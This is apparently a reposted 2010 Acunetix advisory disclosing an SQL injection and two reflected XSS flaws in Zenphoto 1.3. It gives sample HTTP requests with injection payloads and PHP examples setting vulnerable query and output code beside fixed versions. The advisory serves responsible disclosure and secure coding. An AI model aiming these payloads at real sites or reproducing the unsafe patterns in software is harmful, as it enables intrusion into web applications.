SECURITYVULNS:DOC:24709
Sep 12, 2010 - 12:00 a.m.

Security problems in Zenphoto version 1.3

vulners.com

We are continuing with the list of security vulnerabilities found in a
number of web applications while testing our latest version of Acunetix
WVS v7. In this blog post, we look into the details of a number of
security problems discovered by Acunetix WVS in the popular web gallery
application Zenphoto.

Zenphoto is a standalone gallery CMS that just makes sense and doesn’t
try to do everything and your dishes. We hope you agree with our
philosophy: simpler is better. Don’t get us wrong though – Zenphoto
really does have everything you need for web media gallery management.

The following web vulnerabilities were found in Zenphoto Version 1.3:

  1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.
  2. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “from”.
  3. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Technical details about each web vulnerability are below:

  1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.

Source file: /var/www/zenphoto_1_3/zp-core/functions-db.php line: 65

Additional details:

SQL Query:
SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"" OR `folder` LIKE "1ACUSTART'"/
ACUEND"

Stack trace:

  1. query([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"" OR `folder` LIKE "1ACUSTART'"/\n ACUEND"", [boolean] false)
  2. query_full_array([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"" OR `folder` LIKE "1ACUSTART'"/\n ACUEND"")
  3. getAlbumInherited([string] "1ACUSTART'"*/\n ACUEND", [string] "album_theme", [NULL] )
  4. themeSetup([string] "1ACUSTART'"*/\n ACUEND")

As you can see in the SQL query (or the stack trace), the value is
embedded in a double-quoted string literal, so in order to alter the SQL
statement sent to the database you need to use a double quote (not a
single one, as in most SQL injections).

Sample HTTP request:
GET /zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75 HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
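The pattern behind this finding, shown as an added PHP example that is not Zenphoto's own code: a vulnerable query builder that drops the folder name into a double-quoted string literal, next to a hardened lookup that binds the value as a parameter. The function names, the $pdo handle and the in-memory SQLite table are assumptions made for the demonstration; the SQL shape and the scanner marker payload (1ACUSTART ... ACUEND) are the ones quoted above.

```php
<?php
// Added example (not Zenphoto's code): the query-building pattern behind the
// full-image.php finding, as a vulnerable helper next to a hardened one.
// The function names, the $pdo handle and the in-memory SQLite table are
// assumptions made for this demonstration; the SQL shape and the marker
// payload (1ACUSTART ... ACUEND) are the ones quoted in the advisory.

declare(strict_types=1);

// VULNERABLE pattern: the folder name is concatenated into a double-quoted
// MySQL string literal. A single quote is harmless inside it, but a double
// quote closes the literal and everything after it is parsed as SQL, which is
// why the advisory's payload needs a double quote instead of a single one.
function build_album_query_unsafe(string $folder): string
{
    return 'SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "' . $folder . '"';
}

// HARDENED pattern: the SQL text is fixed and the folder travels as a bound
// parameter, so no character in it can change the statement.
function fetch_album_theme_safe(PDO $pdo, string $folder): ?string
{
    $stmt = $pdo->prepare('SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE ?');
    $stmt->execute([$folder]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['album_theme'];
}

// Constructed fixture: an in-memory SQLite database standing in for MySQL
// (SQLite accepts backtick-quoted identifiers for MySQL compatibility).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE `zp_albums` (`id` INTEGER PRIMARY KEY, `folder` TEXT, `album_theme` TEXT)');
$pdo->exec('INSERT INTO `zp_albums` (`folder`, `album_theme`) VALUES (\'holiday\', \'default\')');

// Scanner marker value from the advisory (it contains a literal newline).
$payload = '1ACUSTART\'"*/' . "\nACUEND";

// 1. The unsafe builder lets the input rewrite the statement: the double quote
//    in the payload terminates the literal early.
echo "unsafe SQL:\n", build_album_query_unsafe($payload), "\n\n";

// 2. The hardened lookup treats the same bytes as plain data: no row matches
//    the marker, while a legitimate folder still resolves to its theme.
echo "safe lookup of marker payload: ";
var_dump(fetch_album_theme_safe($pdo, $payload));
echo "safe lookup of 'holiday': ";
var_dump(fetch_album_theme_safe($pdo, 'holiday'));
```

Run it with `php example.php`; it needs the pdo_sqlite extension, which ships with most PHP builds. The point is not the fixture but the contrast: the unsafe builder's output changes with the input, the prepared statement's SQL text never does.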

  2. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “from”.

Attack details

URL encoded GET input from was set to " onmouseover=prompt(934419) bad=".
The input is reflected inside a tag element between double quotes.

Sample HTTP request:
GET /zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22 HTTP/1.1
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

  3. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Attack details

URL encoded POST input user was set to " onmouseover=prompt(932890) bad=".
The input is reflected inside a tag element between double quotes.

Sample HTTP request:
POST /zenphoto_1_3/zp-core/admin.php HTTP/1.1
Content-Length: 149
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

code_h=1644ca84b35bf7663c5e828744339de8&login=1&pass=acUn3t1x&redirect=%2fzp-core%2fadmin.php&user=%22%20onmouseover%3dprompt%28932890%29%20bad%3d%22
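Both admin.php findings (the "from" GET parameter and the "user" POST parameter) come down to the same defect: a request value reflected inside a double-quoted attribute without encoding. The following added PHP example, which is not Zenphoto's own code, renders such a field the vulnerable way next to the hardened way. The function names and the form markup are assumptions made for the demonstration; the payload shape is the one quoted in the attack details above.

```php
<?php
// Added example (not Zenphoto's code) covering both admin.php findings
// (the "from" GET parameter and the "user" POST parameter): a request value
// reflected inside a double-quoted HTML attribute. The function names and the
// form markup are assumptions made for this demonstration; the payload shape
// is the one quoted in the advisory.

declare(strict_types=1);

// VULNERABLE pattern: the raw value is dropped into value="...". A double
// quote in the input ends the attribute, and what follows is parsed as further
// attributes of the same tag, such as an onmouseover handler.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// HARDENED pattern: htmlspecialchars() with ENT_QUOTES encodes both quote
// kinds as well as <, > and &, so the value cannot leave its attribute.
// Every reflected parameter gets the same treatment, whether GET or POST.
function render_field_safe(string $name, string $value): string
{
    $enc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="' . $enc($name) . '" value="' . $enc($value) . '">';
}

// Crude structural check used only to make the difference visible: count the
// attributes the rendered tag actually carries. The template writes three;
// anything above that means the input has broken out of its attribute.
function attribute_count(string $html): int
{
    return preg_match_all('/\s[a-z]+=/i', $html);
}

// Constructed inputs, taken from the advisory's attack details.
$payloads = [
    'user' => '" onmouseover=prompt(932890) bad="',   // POST side
    'from' => '" onmouseover=prompt(934419) bad="',   // GET side
];

foreach ($payloads as $name => $value) {
    $unsafe = render_field_unsafe($name, $value);
    $safe   = render_field_safe($name, $value);
    printf("%-5s unsafe (%d attributes): %s\n", $name, attribute_count($unsafe), $unsafe);
    printf("%-5s safe   (%d attributes): %s\n\n", $name, attribute_count($safe), $safe);
}
```

Run it with `php example.php` (PHP 7.4 or later for the arrow function). The attribute count is only a visual aid; the fix is the encoding in render_field_safe(), and it has to be applied in every place a parameter is echoed into markup, not just where the scanner happened to hit.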

These vulnerabilities were reported to the Zenphoto team on 22/7/2010
via the trac system on their website and were fixed in the latest
version of Zenphoto. If you are using Zenphoto, download the latest
version from their website.

Bogdan Calin - bogdan [at] acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
Follow us on Twitter - http://www.twitter.com/acunetix